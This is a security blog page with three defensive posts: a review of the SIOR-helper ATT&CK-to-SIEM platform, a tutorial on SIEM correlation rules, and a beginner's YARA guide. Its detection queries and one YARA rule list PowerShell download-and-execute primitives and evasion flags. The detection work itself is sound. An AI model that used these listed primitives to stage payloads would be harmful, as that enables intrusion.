MITRE ATT&CK to SIEM Rules: A Practical Look at SIOR-Helper


Hey there, fellow threat hunters! 👋 Today we're talking about something that caught my attention while browsing the endless wasteland of security tools - a platform called SIOR-helper.com. It's trying to solve the gap between reading about threats and actually detecting them, which honestly is a problem we've all pretended doesn't exist while manually crafting SIEM rules.

SIOR Logo

Now, before you get excited thinking this is some revolutionary breakthrough, let me set expectations: it's not going to change your life. But it might save you a few hours of Googling "how to detect [insert technique here]" at 2 AM.

The Manual Labor Problem

Let's be honest about our current workflow. You see a shiny new attack technique, think "I should detect this," and then embark on the time-honored tradition of:

  • Reading MITRE ATT&CK documentation
  • Searching for detection strategies across 15 different blogs
  • Finding half-working examples in various SIEM languages
  • Adapting them to your specific environment
  • Testing and tuning until they don't alert on notepad.exe

SIOR is basically asking "what if we skipped some of these steps?" It's not groundbreaking, but it's not terrible either.

What SIOR Actually Offers

SIOR provides a few useful features:

Analysis Generation

You can search by keywords or threat groups and get relevant MITRE techniques. In their example, searching "ransomware" returned 73 techniques. It's faster than manually browsing the ATT&CK matrix, though let's be real - that's not exactly a high bar.


Detection Repository

For almost every technique, they provide detection rules, responses, tests, and vulnerability information. The LSASS Memory example shows 77 detection rules. That's... actually pretty comprehensive, assuming the quality is decent.

SIOR - Techniques Overview


SIEM Platform Conversion

They've integrated Sigma rule conversion for different platforms - Splunk, Elasticsearch, QRadar, LogPoint. This is genuinely useful since rewriting queries for different SIEMs is about as fun as it sounds.

A Realistic Example

Let's say you need to detect T1003.001 (LSASS Memory dumping). Here's how SIOR might help:

# Traditional approach 1. Research the technique 2. Find detection
strategies from various sources 3. Write platform-specific queries 4. Test and tune for your environment 5. Hope it works # SIOR approach 1. Search for the technique 2. Browse available detection rules 3. Convert to your SIEM platform 4. Still need to test and tune for your environment 5. Hope it works

Notice the last two steps are the same? That's because no tool can magically understand your specific environment and tuning requirements. SIOR just saves you some of the research legwork.

SIOR - Advanced Search Builder

The Reality Check

Let's address what SIOR actually is: a crowdsourced repository of detection content with some helpful automation features. It's not revolutionary, but it's practical. The platform is admittedly still in development and has bugs, which means you should treat it like any other beta tool.

The value proposition is simple: instead of starting from scratch every time, you can start from someone else's work and adapt it. That's useful, but it's not going to fundamentally change how security operations work.

Community-Driven Content

The platform allows users to create and share custom detections, which could be valuable if the community actually uses it. The success of this kind of initiative depends entirely on adoption and content quality - both unknown quantities at this point.

Integration Perspective

SIOR positions itself as a research assistant, not a replacement for thinking. It fits into your workflow like this:

  • Use it to find relevant techniques and existing detection rules
  • Leverage the SIEM conversion features to get platform-specific queries
  • Still do your own testing, tuning, and validation
  • Contribute improvements back if you're feeling generous

It's basically a shortcut through the research phase, which is fine - research shortcuts are useful.

Who Might Find This Useful

SIOR could be helpful for:

  • SOC teams that don't want to research every technique from scratch
  • Organizations without dedicated threat intelligence resources
  • Security professionals who work with multiple SIEM platforms
  • Anyone tired of manually browsing MITRE ATT&CK matrices

It's not going to replace your security tools or your brain, but it might save you some time on the mundane stuff.

Heat Map Visualization: Seeing Your Detection Gaps

One feature that's actually pretty neat is SIOR's heat map visualization of your analysis runs. When I created an analysis run for ransomware techniques, I could see a visual representation of the entire MITRE ATT&CK matrix with color-coded coverage indicators.

SIOR - Run Navigator

In my analysis, I ended up covering 88 techniques out of 1076 total techniques (8% coverage), leaving 988 techniques unanalyzed. The heat map uses different colors to show coverage levels:

  • Complete Coverage: Techniques where I found detections, responses, and tests
  • Partial Coverage: Techniques with some but not all security controls
  • Detection Only: Techniques with detection rules but no response procedures
  • No Data: Techniques I haven't looked at yet

I could filter the view to show only techniques with data, which helped me focus on what I'd actually covered versus the overwhelming sea of unanalyzed techniques. It's a straightforward way to visualize your detection gaps and prioritize where to focus next - assuming you can handle the reality check of seeing how much you haven't covered yet.

This kind of visual coverage analysis is genuinely useful for understanding where you stand against the full ATT&CK matrix, rather than just hoping you've got the "important" stuff covered.

The Bottom Line

SIOR is a tool that solves a real problem (the gap between threat intelligence and detection implementation) with a reasonable approach (community-sourced content with automation features). It's not perfect, it's still developing, and it won't solve all your detection challenges.

But you know what? Sometimes "good enough to try" is exactly what we need in security. We've got bigger problems than whether a free tool has some rough edges.

Is it worth creating an account and poking around? Probably. Will it revolutionize your security operations? Probably not. But if it saves you a few hours of manual research here and there, that's time you can spend on more interesting problems.

The security industry needs more practical tools that address real operational challenges. SIOR is an attempt at that, and honestly, we could use more attempts rather than fewer.

Stay safe, and happy hunting! 🕵️‍♂️

P.S. The platform offers a live example without registration, so you can check it out without committing to anything. Ah, and it's also free!

References

Ready to dive deeper into detection engineering and threat hunting platforms? These resources will help you level up your game:

From Logs to Threats: SIEM Correlation Rules for Real Attacks

SIEM correlation rules are what turn a pile of Windows events into actual detections. Single-event rules ("alert on Event 4625") generate a lot of tickets and miss most attacks; correlation rules tie events together across users, hosts, and time to recognise the shapes that matter. This post walks through three concrete attack chains and the correlation logic we use to catch them in Splunk, Elastic, and QRadar query languages.

Key Takeaways

  • Correlation rules join events across time, user, host, or source IP — a single event rarely tells the whole story.
  • Anchor each rule to a MITRE ATT&CK technique. It forces precision and gives the analyst context when the rule fires.
  • The three high-value patterns we always implement first: failed-to-successful authentication progression, suspicious PowerShell execution chain, and persistence creation right after privileged authentication.
  • Time windows are the single most-tuned setting. Too narrow and the rule misses related events; too wide and unrelated events get linked.
  • Always baseline before deploying. A correlation rule that has not seen your environment's normal patterns is guaranteed to alert on legitimate activity.

Environment

  • Windows endpoints and Domain Controllers forwarding to a central SIEM.
  • Advanced audit policy enabled — at minimum Account Logon, Logon/Logoff, Process Creation, and Object Access categories.
  • PowerShell module logging and script block logging enabled via Group Policy.
  • A SIEM that supports time-windowed joins. Examples below cover Splunk SPL, Elastic ES|QL, and IBM QRadar AQL.

The Problem

Most SIEM deployments accumulate logs faster than they accumulate detection. Single-event rules survive only until they are tuned out: "alert on 4625" becomes noise the first time someone fat-fingers a password ten times in a row. The events themselves are not the problem — they are evidence. Correlation rules use that evidence to recognise the shapes of real attacks: dwell time, lateral progression, the order in which artefacts appear.

The three patterns below cover a large fraction of the attack chains we see in mid-sized Windows environments. They are not exhaustive; they are the rules we ship first because the cost-to-value ratio is best.

The Solution

Pattern 1 — Brute force to successful logon to lateral movement (T1110.001 → T1078 → T1021)

An attacker spraying RDP against an exposed jump host succeeds, logs in, and immediately tries other internal hosts. The shape in Windows events:

  • 4625 — multiple failed logons from a single source IP over a short window.
  • 4624 — successful logon from the same source IP within a few minutes.
  • 4648 or 5140 — explicit-credential use or network-share access from the same actor shortly after.

Splunk SPL implementation:

index=windows EventCode=4625
| bucket _time span=5m
| stats count as failed_count, min(_time) as first_fail, max(_time) as last_fail by src_ip
| where failed_count >= 10
| join src_ip type=inner
    [ search index=windows EventCode=4624
      | rename _time as success_time
      | fields src_ip, success_time, user ]
| where success_time > last_fail AND success_time < (last_fail + 600)
| join src_ip type=inner
    [ search index=windows (EventCode=4648 OR EventCode=5140)
      | rename _time as lateral_time
      | fields src_ip, lateral_time, dest_host ]
| where lateral_time > success_time AND lateral_time < (success_time + 1800)
| table src_ip, user, dest_host, first_fail, success_time, lateral_time, failed_count

The three time windows are tunable. 10 failures in 5 minutes is conservative; drop to 5 in 1 minute for tighter detection on hardened systems. The 30-minute lateral-movement window catches slower follow-ups.

Pattern 2 — PowerShell host with encoded staging (T1059.001 + T1105)

Operators rarely run plain powershell.exe with no arguments. The shape that matters is a host process spawned by Office or a browser, paired with script-block content that downloads and executes:

  • 4688 — process creation, parent in {winword.exe, excel.exe, outlook.exe, mshta.exe}, child is powershell.exe or pwsh.exe.
  • 4104 — script block logged from the PowerShell operational log containing DownloadString, FromBase64String, Invoke-Expression, or -EncodedCommand.
  • The two events appear under the same correlation key (computer + new-process GUID) within seconds.

Elastic ES|QL:

FROM logs-windows-*
| WHERE event.code IN ("4688", "4104")
| WHERE @timestamp > NOW() - 1 HOUR
| EVAL bucket = DATE_TRUNC(1 MINUTES, @timestamp)
| STATS
    bad_process  = COUNT_DISTINCT(CASE WHEN event.code == "4688"
                       AND winlog.event_data.NewProcessName LIKE "%powershell%"
                       AND winlog.event_data.ParentProcessName RLIKE ".*(winword|excel|outlook|mshta)\\.exe" THEN 1 END),
    bad_script   = COUNT_DISTINCT(CASE WHEN event.code == "4104"
                       AND powershell.script_block_text RLIKE "(?i)(downloadstring|frombase64string|invoke-expression|-encodedcommand)" THEN 1 END)
    BY host.name, bucket
| WHERE bad_process > 0 AND bad_script > 0
| SORT bucket DESC

The host-name plus minute-bucket join handles the common case where the two events arrive seconds apart but in different channels. Add user.name to the STATS BY when running on a fleet.

Pattern 3 — Persistence right after privileged authentication (T1078 → T1543/T1547)

Most credential theft is only valuable if the attacker plants persistence with the stolen identity. The signal is a new service or Run-key registration shortly after an administrative logon:

  • 4672 — special privileges assigned to a new logon (administrator).
  • 7045 — new service installed (System log); or 4657 — registry value modified under a Run key (Security log, requires Object Access audit).
  • Same user and same host within ~10 minutes.

QRadar AQL:

SELECT
    "User Name" AS user,
    sourceaddress  AS src,
    "Service Name" AS svc,
    MIN(starttime) AS auth_time,
    MAX(starttime) AS persist_time
FROM events
WHERE
    (eventid = '4672' OR eventid = '7045' OR eventid = '4657')
    AND starttime > NOW() - INTERVAL '2 HOURS'
GROUP BY "User Name", sourceaddress, "Service Name"
HAVING
    COUNT(DISTINCT eventid) >= 2
    AND (MAX(starttime) - MIN(starttime)) < 600000   -- 10 minutes in ms
ORDER BY auth_time DESC

The 10-minute window is the practical floor for "this looks like one person acting". Tighten it for high-fidelity service tiers; widen it for environments where legitimate admins genuinely do install services in batches.

Step 4 — Build a baseline before you deploy

Every correlation rule needs a baseline run before it goes live. Pull the rule's query, drop the alerting threshold, and look at what fires over the last 30 days. Common surprises:

  • Scheduled tasks that legitimately spawn PowerShell at 02:00 every night.
  • Backup or imaging tools that touch service and registry keys at boot.
  • Helpdesk admin tooling that performs explicit-credential logons across hosts.

Each of these turns into an exclusion: a user, a host, a parent process, a service name. Document the exclusion in the rule's metadata so the next analyst can see why it is there.

Step 5 — Anchor every rule to a MITRE ATT&CK technique

Tagging rules with the technique they detect does two things: it forces you to be specific about the behaviour, and it gives the analyst a starting point for response. The three rules above map cleanly:

  • Pattern 1 → T1110.001 (Password Guessing) + T1021 (Remote Services)
  • Pattern 2 → T1059.001 (PowerShell) + T1105 (Ingress Tool Transfer)
  • Pattern 3 → T1543.003 (Windows Service) or T1547.001 (Registry Run Keys)

Once every active rule has a technique tag, you have a coverage map. Gaps in the map are where to invest next.

Step 6 — Measure what the rules actually deliver

Each rule needs three running metrics:

  • True positive rate — share of alerts the IR team confirmed as real activity. Target above 50%.
  • Time to detect — minutes between the first contributing event and the alert. Aim for under five.
  • False positive rate — share of alerts closed as benign. Above 20% means tune; above 50% means disable and rebuild.

Track them in a small Splunk/Kibana dashboard. Without them the rules drift, and "the SIEM is too noisy" becomes the same lived experience all over again.

Frequently Asked Questions

Why not just use vendor-shipped correlation packs?

Use them as a starting point, but expect to rewrite most. Vendor packs target the broadest possible audience, which means generous thresholds and field assumptions that may not match your environment. The rules above are specific to Windows events and tuned for normal admin behaviour; a vendor pack cannot know what "normal" looks like for you.

How tight should the time windows be?

Tight enough that unrelated activity does not get joined, loose enough that genuine attack chains stay connected. For interactive attacks, 5–15 minute windows are usually right. For staged or low-and-slow campaigns, hours; for ransomware execution sequences, seconds.

What about correlation across data sources, not just Windows logs?

Same idea, more keys. Add EDR alerts, firewall denies, and proxy logs to the join key on user, host, and time. The cost is field normalisation — different sources use different field names, so plan ingestion-side mappings before writing the rule.

Can I express these in Sigma?

Most single-event detections, yes. Sigma's correlation extension (introduced in Sigma 2.x) covers temporal joins and N-of-M aggregations, which is enough for the three patterns above. Convert Sigma to your SIEM's native query language with the official Sigma converter rather than maintaining two versions.

How often should I re-tune correlation rules?

Every quarter, plus any time the environment changes materially (new EDR deployment, new admin tooling, a different patch cadence). Track the three metrics above and re-tune when any drift outside its target.

Conclusion

A SIEM that just stores logs is an expensive log store. The leverage comes from correlation: a small number of rules that recognise the multi-step shapes attackers actually move in. Start with the three patterns above, anchor each rule to a MITRE technique, baseline before deploying, and measure every alert. Within a quarter the same SIEM will be telling you genuinely useful things — and the alert volume will go down, not up.

Related Posts

Authoritative references: MITRE ATT&CK and SigmaHQ rule project.

YARA Rules for Beginners: Teaching Your Computer to Spot Bad Guys

YARA rules are the closest thing defenders have to a structured language for describing malware. Antivirus signatures match exact bytes; YARA matches patterns, conditions, and combinations of both. This post is the starting point we hand to new threat-hunting analysts on the team — what YARA is, the parts of a rule that actually matter, and a working ruleset for the patterns that come up most often.

Key Takeaways

  • A YARA rule is three sections: meta (author, date, description), strings (patterns to match), and condition (when the rule fires).
  • The pe, elf, and math modules turn YARA from a string-matcher into a structural analyser of binaries.
  • Conditions can count occurrences (#string1 > 5), reference subsets (any of ($a*)), or test file properties (filesize < 1MB).
  • False positives are the main risk. Use fullword, hex anchors, and PE structure tests to keep rules tight.
  • YARA is one tool in a defender's kit. Pair it with VirusTotal, Sigma rules in the SIEM, and Microsoft Defender for Endpoint or another EDR for layered detection.

Environment

  • YARA 4.5 or later (the version with the modern pe module).
  • Windows, macOS, or Linux — YARA is cross-platform.
  • Python 3.10+ with yara-python if you want to embed YARA in scripts.
  • A controlled lab environment for testing rules against real samples. Production binaries only run through YARA, not the other way around.

The Problem

Manual triage scales poorly. Looking at every executable that lands on a fleet, every attachment that hits a mailbox, every file an EDR flags as "potentially unwanted" is not realistic past a few hundred hosts. YARA's value proposition is offloading the first pass: a well-written rule recognises a family at scale, lets you cluster samples that share a signature, and gives an analyst something to read other than "this looks suspicious".

The tradeoff is that a rule which fires on legitimate software is worse than no rule at all — it teaches the analyst to ignore output. The recipes below lean on signal that is statistically uncommon in clean code: API combinations rather than single API names, hex sequences from unpacking stubs, and PE structure abnormalities that almost never appear in signed third-party software.

The Solution

Step 1 — Read the anatomy of a rule

Every YARA rule has the same three-part shape:

rule example_rule
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "Brief description of what this catches and why"
        reference   = "URL or hash you derived the rule from"
        severity    = "medium"

    strings:
        $text = "literal string"
        $hex  = { 4D 5A ?? ?? 50 45 }    // ?? is one wildcard byte
        $re   = /https?:\/\/[a-z0-9.]+\/[a-z]{3,}\.exe/i

    condition:
        any of them
}

meta is documentation. It is optional to YARA but mandatory for anyone reading the rule three months later. Always include the date, the author, and one sentence on what the rule is for.

Step 2 — Use string modifiers to control what matches

Plain strings are case-sensitive, ASCII, and match anywhere. Modifiers tighten the match:

strings:
    $a = "powershell"                       // exact, case-sensitive
    $b = "powershell" nocase                // case-insensitive
    $c = "PowerShell" wide                  // UTF-16 (typical of .NET / Windows strings)
    $d = "powershell" ascii wide            // both encodings
    $e = "powershell" nocase ascii wide fullword
    $f = "powershell" base64                // matches the base64 encoding of the bytes
    $g = "powershell" xor                   // matches XOR-encoded variants

fullword prevents cmd.exe from matching inside backup-cmd.exe.txt. base64 and xor are how you catch packed payloads that contain encoded versions of plaintext strings.

Step 3 — Use hex patterns for unpackers and known byte sequences

Hex strings let you express byte patterns with wildcards, alternations, and jumps. They are the right tool for matching prologues, magic numbers, and small code fragments:

strings:
    $mz_pe = { 4D 5A [60-260] 50 45 00 00 }       // MZ … PE\0\0 with a variable gap
    $entry = { 55 8B EC 83 EC ?? ?? FF 75 ?? }    // typical x86 prologue + arg
    $alt   = { 4D 5A ( 90 | 50 ) 00 }             // either of two next bytes

Hex patterns are dramatically faster to evaluate than regular expressions. Prefer them when the data you are looking for has a stable byte signature.

Step 4 — Compose conditions deliberately

The condition is what controls false-positive rate. The two patterns that get the most mileage:

condition:
    // N of M: at least N of the listed strings present
    2 of ($net*) and 1 of ($crypto*)

    // Structural anchor + content: must look like a PE, must contain specific bytes
    uint16(0) == 0x5A4D and filesize < 5MB and any of ($mark*)

    // Negative conditions: avoid matching legitimate files
    any of ($mal*) and not any of ($benign*)

uint16(0) == 0x5A4D is the cheap way to confirm "this is a PE" without importing the pe module. It catches roughly the same set of files at a fraction of the runtime cost.

Step 5 — A practical rule for suspicious PowerShell artefacts

This is the rule we run against every new attachment that lands in our triage queue. It is permissive enough to be useful and tight enough that the analyst can read the hit and decide:

rule SS_Suspicious_PowerShell_Artifact
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "PowerShell host invocation paired with at least one staging primitive"
        severity    = "medium"

    strings:
        $host1 = "powershell" nocase ascii wide
        $host2 = "pwsh"       nocase ascii wide

        $arg1 = "-enc"               nocase ascii wide
        $arg2 = "-encodedcommand"    nocase ascii wide
        $arg3 = "-w hidden"          nocase ascii wide
        $arg4 = "-windowstyle hidden" nocase ascii wide
        $arg5 = "-noprofile"         nocase ascii wide
        $arg6 = "-executionpolicy bypass" nocase ascii wide

        $api1 = "DownloadString"    nocase ascii wide
        $api2 = "DownloadFile"      nocase ascii wide
        $api3 = "Invoke-Expression" nocase ascii wide
        $api4 = "IEX"               fullword ascii wide

    condition:
        any of ($host*) and 1 of ($arg*) and 1 of ($api*)
}

The N-of-M shape means the rule never fires on a casual mention of PowerShell in a help file, but does fire on the staging combination that loaders use. Tune the threshold per environment.

Step 6 — PE structure matching for packed and weird binaries

Importing the pe module exposes the parsed PE structure. Packers, droppers, and signed-malware-with-trailing-data look obviously different from clean files at this level:

import "pe"

rule SS_Packed_PE_Indicators
{
    meta:
        author      = "Security Scriptographer"
        date        = "2026-05-28"
        description = "Heuristic: PE with very few sections, low entry-point offset, or known packer markers"
        severity    = "low"

    condition:
        pe.is_pe and
        pe.number_of_sections < 3 and
        pe.entry_point < 0x1000 and
        (
            for any section in pe.sections : ( section.name == ".UPX0" ) or
            for any section in pe.sections : ( math.entropy(section.raw_data_offset, section.raw_data_size) > 7.5 )
        )
}

High section entropy (>7.5) is a strong indicator of compression or encryption. Combine with section-count and entry-point heuristics to drop false-positive rate.

Step 7 — Test before you ship

Every rule needs to be evaluated against two corpora: a known-bad set you expect it to match, and a known-good set you expect it not to. The YARA CLI handles both:

# Match a single rule against a single file
yara my_rules.yar suspicious.bin

# Match all rules in a directory against a tree
yara -r ./rules/ /samples/malware/

# Verbose output (prints which strings matched and where)
yara -s my_rules.yar suspicious.bin

# Count matches without listing them
yara -c my_rules.yar /samples/clean/

A rule that fires on more than a handful of clean files is broken, even if it looks elegant. Trim the strings or tighten the condition before you commit it.

Frequently Asked Questions

Is YARA a replacement for antivirus?

No. AV products do scheduled scanning, on-access protection, behavioural blocking, and signature distribution. YARA is a pattern-matching engine you point at a corpus or feed via integration. The two are complementary: AV blocks known threats in real time; YARA gives you a language for the patterns AV cannot express.

How do I integrate YARA with Defender for Endpoint?

MDE does not consume YARA rules directly, but it consumes indicators and custom detections. The workflow is: write a YARA rule, generate matching hashes / file properties, and push those as MDE indicators. For more expressive detection, use Sigma rules with Defender for Cloud or Microsoft Sentinel.

What is the performance impact of complex rules?

Regular expressions and large condition sets dominate runtime. Keep any of over wide string sets cheap, prefer hex over regex, and put cheap conditions (filesize, uint16(0)) first so YARA can short-circuit before evaluating the expensive parts.

Can I write rules for non-PE files?

Yes — YARA works on any file. The elf and macho modules exist for Linux and macOS binaries; the dotnet module exposes managed-assembly structure; PDFs, Office documents, and scripts all match plain strings and regexes happily.

Where do I find good rule sets to learn from?

The Yara-Rules/rules repository on GitHub is the community baseline. Vendor rule sets from Trend Micro, Florian Roth (Neo23x0/signature-base), and Elastic Security are good for studying real-world patterns. Always read a community rule before deploying it — they vary in false-positive risk.

Conclusion

YARA is the first language defenders should learn after they understand the basics of file formats. The rules you write encode the threats you have actually seen, in a form that scales across millions of files and integrates with most of the security stack. Start with the three-section anatomy, build rules around N-of-M conditions over short string sets, and test against both malicious and benign corpora before deploying. Within a few months you will have a small, maintainable ruleset that does more useful triage work than the average analyst's inbox.

Related Posts

Authoritative reference: YARA Documentation.